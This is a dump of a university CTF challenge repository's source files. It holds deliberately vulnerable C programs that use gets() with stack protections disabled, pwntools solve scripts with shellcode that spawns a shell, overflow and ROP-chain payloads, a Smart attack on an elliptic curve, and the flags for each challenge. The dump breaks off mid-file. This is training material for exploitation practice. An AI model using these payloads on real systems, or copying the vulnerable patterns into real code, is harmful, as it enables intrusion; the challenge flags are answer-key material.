├── .gitattributes ├── .gitignore ├── Binary Exploitation ├── baby-shellcode │ ├── README.md │ ├── chal │ │ └── baby-shellcode │ ├── solve │ │ ├── README.md │ │ ├── flag │ │ └── ntr.py │ └── src │ │ ├── baby-shellcode.asm │ │ └── makefile ├── basic-overflow │ ├── README.md │ ├── chal │ │ └── basic-overflow │ ├── solve │ │ ├── README.md │ │ ├── basic-overflow │ │ ├── flag │ │ └── ntr.py │ └── src │ │ ├── basic-overflow.c │ │ └── makefile ├── nothing-to-return │ ├── README.md │ ├── chal │ │ ├── ld-linux-x86-64.so.2 │ │ ├── libc.so.6 │ │ └── nothing-to-return │ ├── solve │ │ ├── README.md │ │ ├── flag │ │ └── ntr.py │ └── src │ │ ├── libc_gadgets.txt │ │ ├── makefile │ │ └── nothing-to-return.c └── patched-shell │ ├── README.md │ ├── chal │ └── patched-shell │ ├── solve │ ├── README.md │ ├── flag │ └── ntr.py │ └── src │ ├── makefile │ └── patched-shell.c ├── Cryptography ├── clever-thinking │ ├── README.md │ ├── chal │ │ └── chal.sage │ └── solve │ │ ├── solve.md │ │ └── solve.sage ├── export-grade-cipher │ ├── Dockerfile │ ├── ctf.xinetd │ ├── solve │ │ ├── soln.py │ │ └── soln_remote.py │ └── src │ │ ├── chal.py │ │ ├── exportcipher.py │ │ ├── flag.py │ │ └── start.sh ├── pianoman │ ├── README.md │ ├── chal │ │ ├── music_cipher.py │ │ ├── musical_e.png │ │ └── output.txt │ └── src │ │ ├── gen.py │ │ ├── output.txt │ │ └── solve.py ├── repeat │ ├── README.md │ ├── chal │ │ ├── flag.enc │ │ └── gen.py │ └── src │ │ ├── flag.enc │ │ ├── gen.py │ │ └── solve.py └── wheel-barrow │ ├── README.md │ ├── chal │ └── transformed.txt │ └── src │ └── solve.md ├── Forensics ├── EnableMe │ ├── README.md │ ├── chal │ │ └── invoice.docm │ ├── solve │ │ ├── flag │ │ └── solve.py │ └── src │ │ └── macro.vba ├── Hourglass │ ├── README.md │ ├── chal │ │ └── info.txt │ ├── command.png │ └── solve │ │ ├── README.md │ │ ├── init.png │ │ └── tasks.png ├── Illusion │ ├── README.md │ └── traffic.pcapng ├── NoGrep │ ├── README.md │ ├── decode.png │ └── path.png ├── Secret Message 2 │ ├── chal 
│ │ └── redacted.png │ └── solve │ │ ├── cropped.png │ │ ├── flag │ │ ├── output.png │ │ └── writeup.md └── Secret Message │ ├── chal │ └── secret.pdf │ ├── solve │ ├── flag │ └── writeup.md │ └── src │ └── gen.py ├── IoT └── babys_first_iot │ ├── LICENSE │ ├── README.md │ ├── remote_chal │ ├── Challenge4 │ │ └── printenv │ ├── Challenge6 │ │ └── Challenge6.7z │ ├── Challenge7 │ │ └── firmware2.bin │ ├── Challenge8_9 │ │ ├── .flag9 │ │ │ └── .flag9 │ │ ├── Binary │ │ ├── File │ │ │ └── Binary │ │ └── flag8 │ ├── StartHackNight.sh │ ├── Submit_Chall1_answer │ │ └── Challenge1 │ ├── Submit_Chall2_answer │ │ └── Challenge2 │ ├── Submit_Chall5_answer │ │ └── Challenge5 │ ├── Submit_Chall6_answer │ │ └── Challenge6 │ └── Submit_Chall7_answer │ │ └── Challenge7 │ ├── solve │ └── solve.md │ └── src │ ├── Binary.c │ ├── Challenge1 │ ├── Challenge1.c │ ├── Challenge2.c │ ├── Challenge5.c │ ├── Challenge6.c │ └── Challenge7.c ├── Jail ├── baby_js_blacklist │ ├── README.md │ ├── chal │ │ ├── Dockerfile │ │ ├── chal.js │ │ ├── package.json │ │ └── run │ └── solve │ │ ├── flag │ │ └── writeup.md ├── babys_first_pyjail │ ├── README.md │ ├── solve │ │ └── writeup.md │ └── src │ │ ├── Dockerfile │ │ ├── chal.py │ │ └── run ├── js_blacklist │ ├── README.md │ ├── chal │ │ ├── Dockerfile │ │ ├── chal.js │ │ ├── package.json │ │ └── run │ └── solve │ │ ├── flag │ │ ├── payload.txt │ │ └── writeup.md ├── js_evaluator │ ├── README.md │ ├── chal │ │ ├── Dockerfile │ │ ├── chal.js │ │ ├── evaluation_patched.js │ │ ├── package.json │ │ └── run │ └── solve │ │ ├── flag │ │ └── writeup.md └── zero │ ├── README.md │ ├── chal │ ├── Dockerfile │ ├── chal.py │ └── run │ └── solve │ ├── flag │ └── writeup.md ├── Miscellaneous ├── Out of the Bucket 2 │ ├── solve │ │ └── solve.md │ └── src │ │ ├── 256x192 │ │ ├── ad.png │ │ ├── ae.png │ │ ├── af.png │ │ ├── ag.png │ │ ├── ai.png │ │ ├── al.png │ │ ├── am.png │ │ ├── ao.png │ │ ├── aq.png │ │ ├── ar.png │ │ ├── as.png │ │ ├── at.png │ │ ├── au.png │ 
│ ├── aw.png │ │ ├── ax.png │ │ ├── az.png │ │ ├── ba.png │ │ ├── bb.png │ │ ├── bd.png │ │ ├── be.png │ │ ├── bf.png │ │ ├── bg.png │ │ ├── bh.png │ │ ├── bi.png │ │ ├── bj.png │ │ ├── bl.png │ │ ├── bm.png │ │ ├── bn.png │ │ ├── bo.png │ │ ├── bq.png │ │ ├── br.png │ │ ├── bs.png │ │ ├── bt.png │ │ ├── bv.png │ │ ├── bw.png │ │ ├── by.png │ │ ├── bz.png │ │ ├── ca.png │ │ ├── cc.png │ │ ├── cd.png │ │ ├── cf.png │ │ ├── cg.png │ │ ├── ch.png │ │ ├── ci.png │ │ ├── ck.png │ │ ├── cl.png │ │ ├── cm.png │ │ ├── cn.png │ │ ├── co.png │ │ ├── cr.png │ │ ├── cu.png │ │ ├── cv.png │ │ ├── cw.png │ │ ├── cx.png │ │ ├── cy.png │ │ ├── cz.png │ │ ├── de.png │ │ ├── dj.png │ │ ├── dk.png │ │ ├── dm.png │ │ ├── do.png │ │ ├── dz.png │ │ ├── ec.png │ │ ├── ee.png │ │ ├── eg.png │ │ ├── eh.png │ │ ├── er.png │ │ ├── es.png │ │ ├── et.png │ │ ├── fi.png │ │ ├── fj.png │ │ ├── fk.png │ │ ├── fm.png │ │ ├── fo.png │ │ ├── fr.png │ │ ├── ga.png │ │ ├── gb-eng.png │ │ ├── gb-nir.png │ │ ├── gb-sct.png │ │ ├── gb-wls.png │ │ ├── gb.png │ │ ├── gd.png │ │ ├── ge.png │ │ ├── gf.png │ │ ├── gg.png │ │ ├── gh.png │ │ ├── gi.png │ │ ├── gl.png │ │ ├── gm.png │ │ ├── gn.png │ │ ├── gp.png │ │ ├── gq.png │ │ ├── gr.png │ │ ├── gs.png │ │ ├── gt.png │ │ ├── gu.png │ │ ├── gw.png │ │ ├── gy.png │ │ ├── hk.png │ │ ├── hm.png │ │ ├── hn.png │ │ ├── hr.png │ │ ├── ht.png │ │ ├── hu.png │ │ ├── id.png │ │ ├── ie.png │ │ ├── il.png │ │ ├── im.png │ │ ├── in.png │ │ ├── io.png │ │ ├── iq.png │ │ ├── ir.png │ │ ├── is.png │ │ ├── it.png │ │ ├── je.png │ │ ├── jm.png │ │ ├── jo.png │ │ ├── jp.png │ │ ├── ke.png │ │ ├── kg.png │ │ ├── kh.png │ │ ├── ki.png │ │ ├── km.png │ │ ├── kn.png │ │ ├── kp.png │ │ ├── kr.png │ │ ├── kw.png │ │ ├── ky.png │ │ ├── kz.png │ │ ├── la.png │ │ ├── lb.png │ │ ├── lc.png │ │ ├── li.png │ │ ├── lk.png │ │ ├── lr.png │ │ ├── ls.png │ │ ├── lt.png │ │ ├── lu.png │ │ ├── lv.png │ │ ├── ly.png │ │ ├── ma.png │ │ ├── mc.png │ │ ├── md.png │ │ ├── me.png │ │ ├── mf.png │ │ 
├── mg.png │ │ ├── mh.png │ │ ├── mk.png │ │ ├── ml.png │ │ ├── mm.png │ │ ├── mn.png │ │ ├── mo.png │ │ ├── mp.png │ │ ├── mq.png │ │ ├── mr.png │ │ ├── ms.png │ │ ├── mt.png │ │ ├── mu.png │ │ ├── mv.png │ │ ├── mw.png │ │ ├── mx.png │ │ ├── my.png │ │ ├── mz.png │ │ ├── na.png │ │ ├── nc.png │ │ ├── ne.png │ │ ├── nf.png │ │ ├── ng.png │ │ ├── ni.png │ │ ├── nl.png │ │ ├── no.png │ │ ├── np.png │ │ ├── nr.png │ │ ├── nu.png │ │ ├── nz.png │ │ ├── om.png │ │ ├── pa.png │ │ ├── pe.png │ │ ├── pf.png │ │ ├── pg.png │ │ ├── ph.png │ │ ├── pk.png │ │ ├── pl.png │ │ ├── pm.png │ │ ├── pn.png │ │ ├── pr.png │ │ ├── ps.png │ │ ├── pt.png │ │ ├── pw.png │ │ ├── py.png │ │ ├── qa.png │ │ ├── re.png │ │ ├── ro.png │ │ ├── rs.png │ │ ├── ru.png │ │ ├── rw.png │ │ ├── sa.png │ │ ├── sb.png │ │ ├── sc.png │ │ ├── sd.png │ │ ├── se.png │ │ ├── sg.png │ │ ├── sh.png │ │ ├── si.png │ │ ├── sj.png │ │ ├── sk.png │ │ ├── sl.png │ │ ├── sm.png │ │ ├── sn.png │ │ ├── so.png │ │ ├── sr.png │ │ ├── ss.png │ │ ├── st.png │ │ ├── sv.png │ │ ├── sx.png │ │ ├── sy.png │ │ ├── sz.png │ │ ├── tc.png │ │ ├── td.png │ │ ├── tf.png │ │ ├── tg.png │ │ ├── th.png │ │ ├── tj.png │ │ ├── tk.png │ │ ├── tl.png │ │ ├── tm.png │ │ ├── tn.png │ │ ├── to.png │ │ ├── tr.png │ │ ├── tt.png │ │ ├── tv.png │ │ ├── tw.png │ │ ├── tz.png │ │ ├── ua.png │ │ ├── ug.png │ │ ├── um.png │ │ ├── us.png │ │ ├── uy.png │ │ ├── uz.png │ │ ├── va.png │ │ ├── vc.png │ │ ├── ve.png │ │ ├── vg.png │ │ ├── vi.png │ │ ├── vn.png │ │ ├── vu.png │ │ ├── wf.png │ │ ├── ws.png │ │ ├── xa.png │ │ ├── xk.png │ │ ├── ye.png │ │ ├── yt.png │ │ ├── za.png │ │ ├── zm.png │ │ └── zw.png │ │ └── flag ├── Out of the Bucket │ ├── chal │ │ ├── secret │ │ │ ├── dont_show │ │ │ └── funny.json │ │ └── src │ │ │ ├── index.html │ │ │ └── static │ │ │ ├── antwerp.jpg │ │ │ ├── guam.jpg │ │ │ └── style.css │ └── solve │ │ └── solve.md ├── Prediction API │ ├── README.md │ ├── solve │ │ ├── flag │ │ ├── solve.ipynb │ │ └── solve.md │ └── src │ │ 
├── app.py │ │ ├── mnist.npz │ │ ├── model.h5 │ │ ├── model.py │ │ ├── requirements.txt │ │ └── templates │ │ └── index.html └── Source Code Recovery │ ├── README.md │ ├── chal │ └── chal.py │ ├── remote_chal │ ├── docker-compose.yml │ ├── exec_jail │ │ ├── Dockerfile │ │ ├── exec_jail.py │ │ └── run │ ├── flag_server │ │ ├── Dockerfile │ │ ├── flag.py │ │ └── flag_server.py │ └── setup.sh │ └── solve │ └── soln.c ├── OSINT └── Flying High │ ├── README.md │ ├── chal │ └── airplane.png │ └── solve │ ├── flag.txt │ └── solve.md ├── README.md ├── Reverse Engineering ├── AllWorbledUp │ ├── chal │ │ └── worbler │ ├── readme.md │ └── solve │ │ ├── makedis.py │ │ ├── soln.md │ │ ├── soln.py │ │ └── worbler.py ├── CEOs Lost Password │ ├── chal │ │ └── BankChallenge.jar │ ├── readme.md │ ├── solve │ │ ├── Solution.java │ │ ├── flag │ │ └── readme.md │ └── src │ │ └── Main.java ├── CSS Password │ ├── README.md │ ├── chal │ │ └── css-password.html │ └── solve │ │ ├── solve.js │ │ └── solve.md ├── RandomMaze │ ├── chal │ │ ├── maze │ │ └── soln.md │ ├── readme.md │ └── solve │ │ ├── maze.c │ │ ├── nodes.c │ │ ├── nodes.h │ │ └── soln.c └── love-debug │ ├── chal │ └── love-letter-for-you │ ├── solve │ ├── result.bin │ ├── result2.bin │ └── solution.md │ └── src │ ├── README.md │ ├── alacritty.bf │ ├── love-letter-for-you.bf │ ├── vscode.bf │ └── windows-terminal.bf └── Web ├── Guestbook ├── README.md ├── chal │ └── index.html └── solve │ ├── README.md │ ├── flag │ └── src │ └── appscript.js ├── Jay's Bank ├── README.md ├── chal │ ├── Dockerfile │ ├── config │ │ └── init.sql │ ├── docker-compose.yml │ ├── index.js │ ├── middleware │ │ └── authMiddleware.js │ ├── package.json │ ├── routes │ │ └── index.js │ ├── static │ │ ├── css │ │ │ ├── dashboard.css │ │ │ ├── login.css │ │ │ ├── main.css │ │ │ ├── profile.css │ │ │ └── register.css │ │ └── js │ │ │ ├── login.js │ │ │ ├── profile.js │ │ │ └── register.js │ ├── utils │ │ ├── config.js │ │ └── db.js │ └── views │ │ ├── 
dashboard.ejs │ │ ├── index.ejs │ │ ├── login.ejs │ │ ├── profile.ejs │ │ └── register.ejs └── solve │ ├── flag │ └── solve.py ├── My First App ├── README.md ├── solve │ ├── arg_err.png │ ├── ascii_err.png │ ├── first_err.png │ └── writeup.md └── src │ ├── .gitignore │ ├── Dockerfile │ ├── app.py │ ├── flag.txt │ ├── requirements.txt │ ├── routes.py │ ├── static │ └── style.css │ ├── templates │ ├── layout.html │ └── register.html │ └── utils.py ├── No Code ├── README.md ├── solve │ └── solve.py └── src │ ├── Dockerfile │ ├── app.py │ ├── flag.txt │ └── requirements.txt ├── The Varsity ├── README.md ├── chal │ ├── Dockerfile │ ├── package.json │ ├── server.js │ ├── static │ │ ├── css │ │ │ ├── index.css │ │ │ └── register.css │ │ └── js │ │ │ ├── index.js │ │ │ └── register.js │ └── views │ │ ├── register.ejs │ │ └── user.ejs └── solve │ ├── flag │ └── solve.py └── Voice Changer ├── README.md ├── chal ├── Dockerfile ├── secret.txt └── src │ ├── index.js │ ├── package.json │ ├── public │ └── index.html │ └── yarn.lock └── solve ├── README.md ├── flag └── img.png /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | package-lock.json 3 | node_modules -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/README.md: -------------------------------------------------------------------------------- 1 | # Baby Shellcode 2 | 3 | This challenge is a test to see if you know 4 | how to write programs that machines can understand. 5 | 6 | Oh, you know how to code? 7 | 8 | Write some code into this program, 9 | and the program will run it for you. 10 | 11 | What programming language, you ask? 12 | Well... 
I said it's the language that *machines* can understand. 13 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/chal/baby-shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/baby-shellcode/chal/baby-shellcode -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/solve/README.md: -------------------------------------------------------------------------------- 1 | # Baby Shellcode 2 | 3 | For the uninitiated, shellcode is a small piece of machine code that an exploit injects into a program; the name comes from its most common job, spawning a shell, often on a remote machine. 4 | 5 | Shellcode is usually written in assembly and kept very small. It is then assembled to machine code and injected into the program. 6 | 7 | So there's nothing too interesting here, just write a simple shellcode that spawns a shell. 8 | 9 | Or you can find a shellcode online and use that. 10 | 11 | Once you have the shellcode, pass it as input to the program, 12 | and it will spawn a shell for you. This works because the challenge reads its input onto the stack and jumps straight to it, and the binary is linked with `-z execstack`; on a binary with a non-executable stack (NX) the same bytes would fault instead of running.
13 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{arbitrary_machine_code_execution} 2 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/solve/ntr.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # https://shell-storm.org/shellcode/files/shellcode-806.html 4 | payload = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 5 | 6 | elf = ELF("../chal/baby-shellcode") 7 | 8 | if args.REMOTE: 9 | # io = remote("localhost", 5000) 10 | io = remote("34.28.147.7", 5000) 11 | else: 12 | io = elf.process() 13 | 14 | io.send(payload) 15 | io.interactive() 16 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/src/baby-shellcode.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | section .text 3 | 4 | _start: 5 | sub rsp, 0x400 6 | mov rdx, 0x400 7 | mov rsi, rsp 8 | mov rdi, 0x0 9 | mov rax, 0x0 10 | syscall 11 | jmp rsp 12 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/src/makefile: -------------------------------------------------------------------------------- 1 | all: baby-shellcode 2 | 3 | baby-shellcode: baby-shellcode.o 4 | ld -z execstack -o baby-shellcode baby-shellcode.o 5 | 6 | baby-shellcode.o: baby-shellcode.asm 7 | nasm -felf64 baby-shellcode.asm 8 | 9 | clean: 10 | rm baby-shellcode.o 11 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/README.md: -------------------------------------------------------------------------------- 1 | # Basic 
Overflow 2 | 3 | This challenge is simple. 4 | 5 | It just gets input, stores it to a buffer. 6 | 7 | It calls `gets` to read input, stores the read bytes to a buffer, then exits. 8 | 9 | What is `gets`, you ask? Well, it's time you read the manual, no? 10 | 11 | `man 3 gets` 12 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/chal/basic-overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/basic-overflow/chal/basic-overflow -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/solve/basic-overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/basic-overflow/solve/basic-overflow -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{reading_manuals_is_very_fun} 2 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/solve/ntr.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF("../chal/basic-overflow") 4 | 5 | # if you run `python ntr.py REMOTE` it will connect to the remote server 6 | if args.REMOTE: 7 | # nc 34.123.15.202 5000 8 | io = remote("34.123.15.202", 5000) 9 | else: 10 | io = elf.process() 11 | 12 | # pwntools can automatically find the offset for us! 
13 | io.sendline(b'A' * 0x48 + p64(elf.sym['shell'])) 14 | 15 | # drop to interactive so we can interact with the shell 16 | io.interactive() 17 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/src/basic-overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void shell() { 5 | execve("/bin/sh", NULL, NULL); 6 | } 7 | 8 | int main() { 9 | char buffer[64]; 10 | gets(buffer); 11 | } 12 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/src/makefile: -------------------------------------------------------------------------------- 1 | CFLAGS := -O0 -fno-stack-protector -no-pie 2 | 3 | basic-overflow: basic-overflow.c 4 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/README.md: -------------------------------------------------------------------------------- 1 | # Nothing to Return 2 | 3 | Now this challenge has a binary of a very small size. 4 | 5 | "The binary has no useful gadgets! There is just nothing to return to!" 6 | 7 | nice try... 
ntr 8 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/chal/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/nothing-to-return/chal/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/chal/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/nothing-to-return/chal/libc.so.6 -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/chal/nothing-to-return: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/nothing-to-return/chal/nothing-to-return -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{libc_is_abundant_of_gadgets} 2 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/solve/ntr.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF( "../chal/nothing-to-return") 4 | libc = ELF("../chal/libc.so.6") 5 | 6 | if args.REMOTE: 7 | io = remote('34.30.126.104', 5000) 8 | else: 9 | io = elf.process() 10 | pause() 11 | 12 | io.recvuntil(b'printf is at 0x') 13 | # in pwntools, you can rebase ELF object like this 14 | libc.address = 
int(io.recvline(), 16) - libc.sym['printf'] 15 | 16 | # you can also use the ROP module of pwntools, but I prefer to use raw ROP chain 17 | pop_rdi = libc.address + 0x0000000000028265 # : pop rdi ; ret 18 | ret = libc.address + 0x000000000002648d # : ret 19 | 20 | rop_chain = [ 21 | pop_rdi, 22 | # you can search the string in libc like this using pwntools 23 | next(libc.search(b'/bin/sh\x00')), 24 | ret, 25 | libc.sym['system'] 26 | ] 27 | 28 | payload = b'A' * 0x48 + b''.join(map(p64, rop_chain)) 29 | 30 | io.recvuntil(b'size:\n') 31 | io.sendline(str(len(payload)).encode('ascii')) 32 | 33 | io.recvuntil(b'input:\n') 34 | io.send(payload) 35 | 36 | io.interactive() 37 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/src/makefile: -------------------------------------------------------------------------------- 1 | CFLAGS := -O0 -fno-stack-protector -no-pie 2 | 3 | nothing-to-return: nothing-to-return.c libc.so.6 ld-linux-x86-64.so.2 4 | $(CC) $(CFLAGS) nothing-to-return.c -o nothing-to-return 5 | pwninit --bin nothing-to-return --ld ld-linux-x86-64.so.2 --libc libc.so.6 6 | mv nothing-to-return_patched nothing-to-return 7 | rm solve.py 8 | ROPgadget --binary nothing-to-return > ropgadgets.txt 9 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/src/nothing-to-return.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void get_input(char *dst) { 6 | size_t input_size; 7 | char *input_buffer; 8 | 9 | puts("Input size:"); 10 | 11 | scanf("%lu[^\n]", &input_size); 12 | 13 | input_buffer = (char *)calloc(1, input_size); 14 | 15 | // hack that reads till the newline 16 | fgets(input_buffer, input_size, stdin); 17 | 18 | puts("Enter your input:"); 19 | fgets(input_buffer, input_size, stdin); 20 | 21 | memcpy(dst, input_buffer, input_size); 22 | 
free(input_buffer); 23 | } 24 | 25 | int main() { 26 | printf("printf is at %p\n", printf); 27 | 28 | char buffer[64]; 29 | 30 | puts("Hello give me an input"); 31 | get_input(buffer); 32 | 33 | puts("I'm returning the input:"); 34 | puts(buffer); 35 | 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/README.md: -------------------------------------------------------------------------------- 1 | # Patched Shell 2 | 3 | Okay, okay. So you were smart enough to do basic overflow huh... 4 | 5 | Now try this challenge! 6 | I patched the shell function so it calls system instead of execve... 7 | so now your exploit shouldn't work! bwahahahahaha 8 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/chal/patched-shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/patched-shell/chal/patched-shell -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/solve/README.md: -------------------------------------------------------------------------------- 1 | # Patched-Shell 2 | 3 | This is just the continuation of basic-overflow. 4 | 5 | Just like in basic-overflow, the buffer is the same size, but this time, `shell` calls `system` instead of `execve`. 6 | 7 | `system` has a requirement that `execve` doesn't have. 8 | When we call `system`, the stack must be aligned to 16 bytes. 9 | This stack alignment requirement exists in most 10 | amd64 Linux systems; it lets library code use aligned SSE instructions, which fault when the stack is misaligned. 11 | 12 | So how do we align the stack to 16 bytes? We return through the `ret` instruction of `main` one extra time before reaching `shell`; that extra return moves the stack pointer by 8 bytes, which restores the alignment.
13 | 14 | ``` 15 | [ 0x40 bytes of buffer ][ old rbp ][ ret addr = ret instruction of main ][ ret addr = shell() ] 16 | ``` 17 | 18 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{patched_the_wrong_function} 2 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/solve/ntr.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF("../chal/patched-shell") 4 | 5 | if args.REMOTE: 6 | io = remote("34.134.173.142", 5000) 7 | else: 8 | io = elf.process() 9 | 10 | # this is ret instruction of main 11 | main_ret = p64(0x40116b) 12 | 13 | io.sendline(b'A' * 0x48 + main_ret + p64(elf.sym['shell'])) 14 | 15 | io.interactive() 16 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/src/makefile: -------------------------------------------------------------------------------- 1 | CFLAGS := -O0 -fno-stack-protector -no-pie 2 | 3 | patched-shell: patched-shell.c 4 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/src/patched-shell.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void shell() { 5 | system("/bin/sh"); 6 | } 7 | 8 | int main() { 9 | char buffer[64]; 10 | gets(buffer); 11 | } 12 | -------------------------------------------------------------------------------- /Cryptography/clever-thinking/README.md: -------------------------------------------------------------------------------- 1 | # clever thinking 2 | 3 | I think that Diffie-Hellman is better with some curves, maybe elliptic ones. Let's share a secret! 
4 | 5 | Wrap the secret (which is a point) in `uoftctf{(x:y:z)}`, where `(x:y:z)` are homogeneous coordinates. -------------------------------------------------------------------------------- /Cryptography/clever-thinking/chal/chal.sage: -------------------------------------------------------------------------------- 1 | m = 235322474717419 2 | F = GF(m) 3 | C = EllipticCurve(F, [0, 8856682]) 4 | 5 | public_base = (185328074730054:87402695517612:1) 6 | 7 | Q1 = (184640716867876:45877854358580:1) # my public key 8 | Q2 = (157967230203538:128158547239620:1) # your public key 9 | 10 | secret = ... 11 | my_private_key = ... 12 | assert(my_private_key*public_base == Q1) 13 | assert(my_private_key*Q2 == secret) 14 | -------------------------------------------------------------------------------- /Cryptography/clever-thinking/solve/solve.md: -------------------------------------------------------------------------------- 1 | The flag is `uoftctf{(11278025017971:36226806176053:1)}`. -------------------------------------------------------------------------------- /Cryptography/clever-thinking/solve/solve.sage: -------------------------------------------------------------------------------- 1 | def SmartAttack(P,Q,p): 2 | E = P.curve() 3 | Eqp = EllipticCurve(Qp(p, 2), [ ZZ(t) + randint(0,p)*p for t in E.a_invariants() ]) 4 | 5 | P_Qps = Eqp.lift_x(ZZ(P.xy()[0]), all=True) 6 | for P_Qp in P_Qps: 7 | if GF(p)(P_Qp.xy()[1]) == P.xy()[1]: 8 | break 9 | 10 | Q_Qps = Eqp.lift_x(ZZ(Q.xy()[0]), all=True) 11 | for Q_Qp in Q_Qps: 12 | if GF(p)(Q_Qp.xy()[1]) == Q.xy()[1]: 13 | break 14 | 15 | p_times_P = p*P_Qp 16 | p_times_Q = p*Q_Qp 17 | 18 | x_P,y_P = p_times_P.xy() 19 | x_Q,y_Q = p_times_Q.xy() 20 | 21 | phi_P = -(x_P/y_P) 22 | phi_Q = -(x_Q/y_Q) 23 | k = phi_Q/phi_P 24 | return ZZ(k) 25 | 26 | 27 | m = 235322474717419 28 | F = GF(m) 29 | C = EllipticCurve(F, [0, 8856682]) 30 | 31 | public_base = C(185328074730054, 87402695517612) 32 | 33 | Q1 = C(184640716867876, 45877854358580) 
# my public key 34 | Q2 = C(157967230203538, 128158547239620) # your public key 35 | 36 | 37 | my_private_key = SmartAttack(public_base, Q1, 235322474717419) # 127556068971283 38 | your_private_key = SmartAttack(public_base, Q2, 235322474717419) # 76918112227635 39 | 40 | secret = my_private_key*Q2 # or your_private_key*Q1 41 | 42 | -------------------------------------------------------------------------------- /Cryptography/export-grade-cipher/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.11-slim 2 | 3 | RUN apt-get update && apt-get install -y \ 4 | xinetd \ 5 | && rm -rf /var/lib/apt/lists/* 6 | 7 | RUN mkdir /ctf 8 | WORKDIR /ctf 9 | RUN useradd -M -d /ctf ctf 10 | 11 | RUN echo "Connection blocked" > /etc/banner_fail 12 | COPY ctf.xinetd /etc/xinetd.d/ctf 13 | COPY ./src /ctf/ 14 | 15 | RUN chown -R root:ctf /ctf && \ 16 | chmod -R 750 /ctf 17 | 18 | ENTRYPOINT [] 19 | CMD ["/usr/sbin/xinetd", "-dontfork"] 20 | 21 | EXPOSE 8000 -------------------------------------------------------------------------------- /Cryptography/export-grade-cipher/ctf.xinetd: -------------------------------------------------------------------------------- 1 | service ctf 2 | { 3 | disable = no 4 | socket_type = stream 5 | protocol = tcp 6 | wait = no 7 | user = ctf 8 | type = UNLISTED 9 | port = 8000 10 | bind = 0.0.0.0 11 | server = /bin/sh 12 | server_args = /ctf/start.sh 13 | banner_fail = /etc/banner_fail 14 | # safety options 15 | per_source = 10 # the maximum instances of this service per source IP address 16 | rlimit_cpu = 1 # the maximum number of CPU seconds that the service may use 17 | #rlimit_as = 1024M # the Address Space resource limit for the service 18 | } -------------------------------------------------------------------------------- /Cryptography/export-grade-cipher/src/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = 
